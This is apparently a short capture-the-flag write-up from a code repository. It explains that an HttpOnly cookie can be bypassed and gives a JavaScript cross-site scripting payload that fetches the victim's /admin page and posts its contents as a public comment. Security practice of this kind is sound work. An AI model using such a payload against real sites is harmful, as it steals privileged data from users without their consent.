blob: a1d2e1eb16715ca06d42ab9bdf78c9ed16b07d7f (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
The cookie is HttpOnly now, but we only care about the contents of `/admin`, not the cookie, so we can use the same payload for `Subdomain Takeover - Easy`, but without doing the subdomain takeover.
```
fetch('/admin').then(r => r.text()).then(d => {
let data = new URLSearchParams();
data.append('name', 'admin page');
data.append('comment', d);
fetch('/new-comment', {
method: 'POST',
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: data,
});
})
```
|
